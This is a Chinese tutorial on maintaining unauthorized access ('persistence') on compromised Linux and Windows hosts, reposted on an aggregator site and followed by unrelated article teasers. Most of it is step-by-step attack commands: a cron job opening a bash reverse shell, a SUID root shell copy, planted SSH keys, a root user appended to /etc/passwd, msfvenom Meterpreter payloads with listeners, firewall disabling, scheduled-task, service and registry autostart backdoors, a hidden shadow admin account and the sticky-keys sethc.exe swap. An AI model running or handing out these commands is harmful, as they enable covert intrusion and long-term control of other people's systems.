内网安全:权限维持的各种姿势

1.Linux权限维持

2.Windows权限维持

目录:

一.Linux权限维持:

1.webshell:

2.定时任务:

3.SUID后门:

4.SSH Key免密登录后门:

5.添加用户后门:

二.Windows权限维持

1.计划任务后门:

2.后门服务:

3.注册表自启:

4.L o g o n s c r i p t s 后门:

5.影子账户:

6.shift后门(粘滞键):








一.Linux权限维持:

1.webshell:

利用:

通过文件上传等各种漏洞利用方式,将恶意脚本上传到web服务中去,就可以直接用工具连接

各种编程语言木马  如:shell.php  dama.php   hack.war

2.定时任务:

利用:

通过给目标机器写入一个定时任务,它会自动执行,我们提前进行监听,即可得到目标机器权限

查看定时任务:crontab -u root -l

修改定时任务:crontab -u root -e

删除定时任务:crontab -u root -r

利用:

kali监听:nc -lvvp 7777

centos写入定时任务:

* * * * * bash -i >&/dev/tcp/ip/端口 0>&1   每分钟运行一次

查看是否写入成功:

写入成功后,我们等待上线

成功上线

3.SUID后门:

将root权限给到一个我们创建的新的程序,并且给它添加s权限,下次就可以用普通用户的身份来执行root用户的权限

这个需要我们拿到root权限再执行

root用户执行:cp /bin/bash /var/.hack

chmod 4775 /var/.hack (添加S权限) 普通用户以root用户的权限来运行

ls -al /var/.hack

我们切换到普通用户

普通用户执行: /var/.hack -p    即可得到root权限

4.SSH Key免密登录后门:

利用kali生成秘钥,将秘钥传到目标机器上,即可进行ssh连接,不用输入密码

生成和查看 (kali执行):

ssh-keygen -t rsa

cd /root/.ssh

cat id_rsa.pub (公钥)

写入centos执行:

cd /root//ssh

vim authorized_keys (只要能写入的权限就可以,可以是其他编辑的权限)vi、vim

将我们生成的公钥写进去即可

连接: ssh root@IP

成功

5.添加用户后门:

介绍:

我们可以对目标机器创建一个新的用户,并且赋予它root权限,下次可以直接远程连接得到shell

生成密码:openssl passwd -1 -salt admin 123456

密码生成以后,我们将其添加到passwd中去:

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /etc/passwd

然后我们查看etc/passwd 看是否添加成功

cat etc/passwd

连接(kali执行):

ssh admin@192.168.11.141

二.Windows权限维持

1.计划任务后门:

 

MSF后门和监听:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9997 -f exe -o update.exe 

监听:msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.11.128;set lport 9997;run"

我们先将防火墙关闭

查看防火墙开关情况:shell netsh firewall show state

发现防火墙开启,那么我们要先将其关闭:shell netsh advfirewall set allprofiles state off

我们查看是否关闭:shell netsh firewall show state

关闭成功

我们将生成的exe上传到目标服务器中

上传成功

创建计划任务:

powershell schtasks /create /tn "\Microsoft\Windows\AppTask\AppRun\updatex" /tr C:\Users\Administrator\Desktop\update.exe /rl highest /F /sc minute /mo 1 /RU system

成功上线

2.后门服务:

kali生成木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9998 -f exe -o back.exe 

监听:

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.11.128;set lport 9998;run"

上传木马:

创建后门服务:

sc create backdoor binpath= "cmd.exe /k C:\Users\Administrator\Desktop\back.exe" start= "auto" obj= "Localsystem" 

这个后门服务需要我们重启电脑才能触发,重启电脑

上线成功

3.注册表自启:

MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9981 -f exe -o regrun.exe

监听:

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.11.128;set lport 9981;run"

上传木马:

添加注册表命令:

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v regrun /t REG_SZ /d " C:\Users\Administrator\Desktop\regrun.exe"

我们进行重启

成功上线

4.L o g o n s c r i p t s 后门:

MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9999 -f exe -o kms.exe

监听:msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.11.128;set lport 9999;run"

上传木马:

添加命令:

REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d " C:\Users\Administrator\Desktop\kms.exe"

重启

成功上线

5.影子账户:

这个需要我们在目标机器上进行添加

创建账户:

创建用户,用户名末尾是$:

net user sysuser1$ 12@H56 /add

加入管理员组:

net localgroup administrators sysuser1$ /add

我们用net user 查看不了这个我们添加的用户 

但是我们查看管理员组是可以看见的:net localgroup administrator sysuser1$,并且在登录页面也可以看到

所以要进一步隐藏

设置SAM权限:

打开Windows的注册表

找到Admin值

显示类型是 x1f4,我们在上面找到这个文件夹,复制F的二进制数据

然后找到我们新添加的sysuser1$的的F文件,将我们复制的粘贴上去

导出注册表:

删除用户:

net user sysuser1$ /del

双击导入两个注册表

(只有注册表中才能看到账号的信息)

开启远程桌面:

最后我们进行连接:

6.shift后门(粘滞键):

覆盖sethc.exe:

#获取整个文件夹及其下面子目录文件的所属权

takeown /f c:\windows\system32\*.* /a /r /d y cacls c:\windows\system32\*.* /T /E /G administrators:F

复制cmd文件,覆盖sethc.exe

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe

在登录界面按5次Shift即可获得管理员shell

返回登录页面

按五下shift,成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/799761.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

NetSuite RPA技术实践

近期有同学提出一个需求。 “需要存取的報表是存貨分類帳(stock ledger),將查到的各個[Item|Location]作為一組key,分別將報表中的「期末庫存量」「期末平均成本」「期末庫存量價值」這三欄的值,在每個月月底的時候自動將這個報表的這三欄數…

rollup打包工具

rollup打包工具 在学习vite和vue3源码的时候,接触到了rollup,所以过来学习一下 什么是rollup rollup是一个模块化的打包工具,会将javascript文件进行合并。比起webpack,webpack在打包的时候会进行代码注入(保障兼容性)&#xf…

位图——哈希思想的应用

三、位图 0、位图概念 所谓位图,就是用每一个比特位来存放某种状态(0或1),是一种哈希思想的应用,适用于海量数据,整数,数据无重复的场景。通常是用来判断某个数据存不存在的。(注意…

GaussDB DWS 详解

文章目录 GaussDB DWS 详解一、简介二、DWS的分布式架构架构概述关键组件 三、分布式查询数据查询流程SQL执行的示例 批注:本文引鉴了Forlogen博主的一些内容,并加以补充,以供学习了解。 GaussDB DWS 详解 一、简介 DWS(Data Warehouse Ser…

数据库-三范式

第一范式 1 数据库所有字段都只有单一属性。 2 单一属性由基本数据类型构成。 3 数据库的表都是二维的行与列。 例如上面的例子就不满足第一范式,因为是可以继续拆分的,拆分为更多的属性。 第二范式 1 符合第一范式 2 表必须有个主建 3 其它字段可以…

《0基础》学习Python——第十一讲__时间函数

一、时间函数是Python中的内置函数和模块,用于处理日期和时间相关的操作。以下是常用的时间函数的种类和用法: 1、time.time():返回当前时间的时间戳。 时间戳(timestamp)是一种表示日期和时间的方式,它是一…

Linux--USB驱动开发(二)插入USB后的内核执行程序

一、USB总线驱动程序的作用 a)识别USB设备 1.1 分配地址 1.2 并告诉USB设备(set address) 1.3 发出命令获取描述符 b)查找并安装对应的设备驱动程序 c)提供USB读写函数 二、USB设备工作流程 由于内核自带了USB驱动,所以我们先插入一个U…

CSS-0_3 CSS和单位

文章目录 CSS的值和单位属性值长度单位CSS和绝对单位CSS和相对单位百分比em & rem视口 颜色单位 碎碎念 CSS的值和单位 我们知道,CSS是由属性和属性值所组成的表 随着CSS的发展,属性不说几千也有几百,我从来不支持去背诵所有的可能性。…

K8S系列-Kubernetes基本概念及Pod、Deployment、Service的使用

一、Kubernetes 的基本概念和术语 一、资源对象 ​ Kubernetes 的基本概念和术语大多是围绕资源对象 Resource Object 来说的,而资源对象在总体上可分为以下两类: 1、某种资源的对象 ​ 例如节点 Node) Pod 服务 (Service) 、存储卷 (Volume)。 2、…

Nginx入门到精通五(动静分离)

下面内容整理自bilibili-尚硅谷-Nginx青铜到王者视频教程 Nginx相关文章 Nginx入门到精通一(基本概念介绍)-CSDN博客 Nginx入门到精通二(安装配置)-CSDN博客 Nginx入门到精通三(Nginx实例1:反向代理&a…

从0-1搭建一个web项目(页面布局详解)详解

本章分析页面布局详解详解 ObJack-Admin一款基于 Vue3.3、TypeScript、Vite3、Pinia、Element-Plus 开源的后台管理框架。在一定程度上节省您的开发效率。另外本项目还封装了一些常用组件、hooks、指令、动态路由、按钮级别权限控制等功能。感兴趣的小伙伴可以访问源码点个赞 地…

java数组之冒泡排序、快速排序

一、排序算法概述 1.算法定义 排序&#xff1a;假设含有n个记录的序列为{R1&#xff0c;R2&#xff0c;...,Rn},其相应的关键字序列为{K1&#xff0c;K2&#xff0c;...,Kn}。将这些记录重新排序为{Ri1,Ri2,...,Rin},使得相应的关键字值满足条Ki1<Ki2<...<Kin,这样的…

使用Keepalived实现双机热备(虚拟漂移IP地址)详细介绍

&#x1f3e1;作者主页&#xff1a;点击&#xff01; &#x1f427;Linux基础知识(初学)&#xff1a;点击&#xff01; &#x1f427;Linux高级管理防护和群集专栏&#xff1a;点击&#xff01; &#x1f510;Linux中firewalld防火墙&#xff1a;点击&#xff01; ⏰️创作…

BI工具的AI革新:对话式分析如何引领企业智能转型?

在数据驱动的时代&#xff0c;数据分析早已成为企业决策制定的关键支撑。但是&#xff0c;很多企业在数字化转型的过程中&#xff0c;常常面临门槛高、流程复杂等问题。而AI技术的发展为解决上述问题带来了突破。 为了简化企业智能转型路径&#xff0c;帆软接入AI大模型技术&a…

Scherlokk - Mac 文件快速搜索对比工具

Scherlokk 是一款适用于 Mac 的文件内容快搜比较工具&#xff0c;在 Scherlokk 内输入关键词&#xff0c;即可在本地磁盘 / 移动硬盘 / 网络驱动器等区域内&#xff0c;查找包含该词的文件&#xff0c;快速定位所需文件&#xff0c;并提供文件比较、快速筛选过滤等功能。 两种…

SpringCloud--常用组件和服务中心

常用组件 Euroke和nacos 区别 负载均衡 负载均衡策略有哪些 自定义负载均衡策略

Power Apps使用oData访问表数据并赋值前端

在使用OData查询语法通过Xrm.WebApi.retrieveMultipleRecords方法过滤数据时&#xff0c;你可以指定一个OData $filter 参数来限制返回的记录集。 以下是一个使用Xrm.WebApi.retrieveMultipleRecords方法成功的例子&#xff0c;它使用了OData $filter 参数来查询实体的记录&am…

YOLOv5分类任务——手势识别

1. 下载YOLOv5官方代码 ONNX > CoreML > TFLite (github.com)">ultralytics/yolov5: YOLOv5 🚀 in PyTorch > ONNX > CoreML > TFLite (github.com) 2. 配置环境 打开终端,先建立名为YOLO5的环境,再将路径切换为requirements.txt文件夹所在的路径…

C#环境与数据类型

文章目录 C#环境.NET 框架集成开发环境 创建一个C#项目数据类型值类型引用类型对象类型object动态类型dynamic字符串类型string 指针类型 类型转换隐式转换显示转换&#xff08;强制转换&#xff09;C#提供的类型转换方法Convert类Parse方法TryParse方法 C#环境 .NET 框架 C#是…

Directory Opus 13 专业版(Windows 增强型文件管理器)值得购买?

在使用电脑时&#xff0c;总少不了和文件打交道。系统自带的 Explorer 资源管理器功能又非常有限&#xff0c;想要拥有一个多功能文件管理器吗&#xff1f; Directory Opus 是一款老牌多功能文件管理器&#xff0c;能很好地接管 Windows 资源管理器。 接管资源管理器 Directo…